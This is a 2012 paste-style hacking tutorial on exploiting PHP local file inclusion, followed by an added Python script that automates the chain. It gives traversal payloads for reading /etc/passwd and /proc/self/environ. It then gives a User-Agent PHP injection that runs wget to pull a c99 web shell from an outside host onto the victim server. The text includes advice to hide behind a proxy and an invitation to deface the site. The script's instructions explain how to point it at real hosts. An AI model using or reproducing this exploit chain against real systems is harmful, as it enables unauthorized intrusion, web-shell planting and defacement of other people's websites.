Topol

LFI Tutorial by Topol

Aug 29th, 2012
Topol's LFI and Shelling through proc/self/environ Tutorial
================================================================================================
Part 1 - Finding a Vulnerable site
 
Tip: it usually takes a few steps to confirm that a site is fully vulnerable, so don't stop at the first error.
 
Say you have a site like this: www.site.com/index.php?page=view.php
You can check for the first sign by adding a ' or a ../ to the page parameter.
You should get some sort of error on the page (a PHP include() or fopen() warning is the classic sign).
Now we can try to read a file outside the web root by asking for /etc/passwd.
So we replace the "view.php" of the site with /etc/passwd like this:
www.site.com/index.php?page=/etc/passwd
That works when the script hands the parameter to include() as-is. If you get the same error as before,
the script is probably putting a directory in front of your input, so keep going up the directories:
 
www.site.com/index.php?page=../etc/passwd
www.site.com/index.php?page=../../etc/passwd
www.site.com/index.php?page=../../../etc/passwd
www.site.com/index.php?page=../../../../etc/passwd <-- Say we finally got it
 
Now we should get something like this (one account per line; the browser often squashes it onto fewer lines):
 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news
 
(Sometimes you will have to add a null byte. That is needed when the script appends something like .php
to your input; %00 cuts the string off before the suffix. It only works on PHP older than 5.3.4, which
started rejecting paths containing null bytes:
www.site.com/index.php?page=../../../../etc/passwd%00)
================================================================================================
Part 2 - Getting the /proc/self/environ
 
We now replace the /etc/passwd with /proc/self/environ. That file is the environment of the web server
process serving your request, and it includes the CGI variables built from your own request headers,
which is what makes Part 3 possible:
www.site.com/index.php?page=../../../../proc/self/environ
 
We should get something like this (this sample was taken on a site whose parameter is called view
rather than page; the real file separates entries with null bytes, which the browser renders as spaces):
 
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.example.com
HTTP_REFERER=http://www.site.com/index.php?view=../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@example.com
SERVER_NAME=www.example.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.site.com Port 80
 
Congrats, you got the /proc/self/environ!
If instead you get a blank page or a permission error, the worker process cannot read its own environ
(common when the server was started as root and then dropped privileges), and this route is closed even
though the LFI itself is real.
================================================================================================
Part 3 - Shelling the site
 
Now that you got your /proc/self/environ, you might be able to shell it.
The trick: the page is include()-ing that file, so PHP parses its contents as source code, and one of
the entries, HTTP_USER_AGENT, is simply your User-Agent header copied in. Put PHP code in the
User-Agent and the server runs it.
Assuming that you use Firefox, you need to download an Add-On called Tamper Data. The link is right here: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Once it is installed, you can find it in the "Tools" menu of Firefox.
Open Tamper Data on www.site.com/index.php?page=../../../../proc/self/environ and click "Start Tamper".
(DO NOT GO TO ANY OTHER PAGES, OR THE /proc/self/environ WON'T LOAD.)
Now refresh the page. It is going to give you 3 options. Click "Tamper".
Now in the User-Agent, you need to put the command that fetches your shell. For this we are going to use the c99 shell.
(ALWAYS USE A PROXY/VPN: the request, User-Agent included, lands in the server's access log.)
So put this in your User-Agent (use the full <?php tag, since the short <? form only works when short_open_tag is on,
and use plain straight quotes; curly quotes like ‘ ’ are a PHP parse error and nothing will run):
 
<?php system('wget http://www.sh3ll.org/c99.txt? -O c99.php'); ?>
 
Now press OK. The page should load, and wget writes the file into the PHP process's current directory,
which for mod_php is the directory of the script, so you can find your shell at www.site.com/c99.php.
If it is not there, wget may be missing on the box or the directory may not be writable by the web server user.
Congrats, now you can take over the site and deface it. Have fun!
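The three parts above are one procedure: find the traversal depth (and whether %00 is needed), read /proc/self/environ, then push PHP through the User-Agent. The script below is an added example, not code from Topol's paste, that drives that whole chain. All network I/O goes through a fetch(url, headers) callable, so it runs offline against the constructed FakeTarget class (a stand-in for a script that does include('pages/' . $_GET['page'] . '.php') under a three-level document root); urllib_fetch is the real transport. The host names, the parameter name and the shell URL are placeholders, and the 7*191 execution probe is this example's own non-destructive check, not something the paste describes.

```python
"""Added example (not part of Topol's paste): driver for the LFI ->
/proc/self/environ -> User-Agent injection chain. Hosts, parameter names
and shell URLs are placeholders; FakeTarget is a constructed stand-in
so the example runs offline."""
import posixpath
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

Fetch = Callable[[str, Dict[str, str]], str]
PASSWD_SIG = re.compile(r"\broot:[^:\n]*:0:0:")            # root:x:0:0: even if newlines were squashed
ENV_KEY = re.compile(r"(?:^|[\s\x00])([A-Z][A-Z0-9_]*)=")   # KEY= right after a separator
EXEC_PROBE = "<?php echo 7*191; ?>"                          # prints 1337 only if PHP ran it


def urllib_fetch(url: str, headers: Dict[str, str]) -> str:
    """Plain GET with custom headers, for use against a real target."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def traversal_candidates(base: str, param: str, target: str,
                         max_depth: int = 8, null_byte: bool = False) -> List[str]:
    """Depth 0 is the absolute path (works when the raw parameter is included);
    deeper entries prepend ../ for scripts that add a directory prefix.
    %00 chops an appended extension, but only on PHP < 5.3.4."""
    tail = "%00" if null_byte else ""
    return [f"{base}?{param}={'/' if d == 0 else '../' * d}{target}{tail}"
            for d in range(max_depth + 1)]


def looks_like_passwd(body: str) -> bool:
    """True if the response embeds /etc/passwd, newlines squashed or not."""
    return PASSWD_SIG.search(body) is not None


def find_lfi(fetch: Fetch, base: str, param: str) -> Optional[Tuple[int, bool]]:
    """(depth, null_byte_needed) for the first URL that leaks /etc/passwd, else None."""
    for nb in (False, True):
        for depth, url in enumerate(traversal_candidates(base, param, "etc/passwd", null_byte=nb)):
            if looks_like_passwd(fetch(url, {})):
                return depth, nb
    return None


def parse_environ(blob: str) -> Dict[str, str]:
    """The real file is NUL-separated; once rendered the separators are spaces,
    so each value (which may itself contain spaces) is the text up to the next KEY=."""
    hits = list(ENV_KEY.finditer(blob))
    env: Dict[str, str] = {}
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(blob)
        env[m.group(1)] = blob[m.end():end].strip("\x00 \r\n\t")
    return env


def ua_payload(shell_url: str, dest: str = "c99.php") -> str:
    """PHP stub sent as the User-Agent; it runs because include() parses
    /proc/self/environ as source and HTTP_USER_AGENT sits inside it.
    Straight quotes are mandatory: curly quotes are a parse error."""
    return f"<?php system('wget {shell_url} -O {dest}'); ?>"


def confirm_execution(fetch: Fetch, environ_url: str) -> bool:
    """Non-destructive check: 1337 appears and the probe's source text does not."""
    body = fetch(environ_url, {"User-Agent": EXEC_PROBE})
    return "1337" in body and EXEC_PROBE not in body


class FakeTarget:
    """Constructed stand-in for index.php doing include('pages/' . $_GET['page'] . '.php')
    with DOCUMENT_ROOT three levels deep. Exists only so this example runs offline."""
    def __init__(self, php_null_byte: bool = True) -> None:
        self.docroot = "/home/sirgod/public_html"
        self.php_null_byte = php_null_byte          # True emulates PHP < 5.3.4
        self.files = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin"}

    def fetch(self, url: str, headers: Dict[str, str]) -> str:
        page = urllib.parse.unquote(url.split("page=", 1)[1]) + ".php"
        if self.php_null_byte and "\x00" in page:
            page = page.split("\x00", 1)[0]          # null-byte truncation of the suffix
        path = posixpath.normpath(self.docroot + "/pages/" + page)   # string concat, like PHP
        if path == "/proc/self/environ":
            ua = headers.get("User-Agent", "Mozilla/5.0")
            out = f"DOCUMENT_ROOT={self.docroot}\x00HTTP_USER_AGENT={ua}\x00REQUEST_URI={url}\x00"
            return out.replace(EXEC_PROBE, "1337")   # "execute" nothing but the harmless probe
        return self.files.get(path, "Warning: include(%s): failed to open stream" % path)


if __name__ == "__main__":
    target = FakeTarget()
    base, param = "http://www.site.com/index.php", "page"
    hit = find_lfi(target.fetch, base, param)
    print("LFI at depth/null byte:", hit)                         # (4, True)
    depth, nb = hit
    env_url = traversal_candidates(base, param, "proc/self/environ", null_byte=nb)[depth]
    print("DOCUMENT_ROOT:", parse_environ(target.fetch(env_url, {})).get("DOCUMENT_ROOT"))
    print("code execution:", confirm_execution(target.fetch, env_url))   # True
    print("shell payload:", ua_payload("http://www.sh3ll.org/c99.txt?"))
```

Against a real host swap target.fetch for urllib_fetch and set base and param to the site's script and parameter. Run confirm_execution before sending the wget payload: a false result with a readable environ usually means the worker cannot read its own environ as PHP, short_open_tag or quoting broke the stub, or something rewrote the User-Agent on the way in.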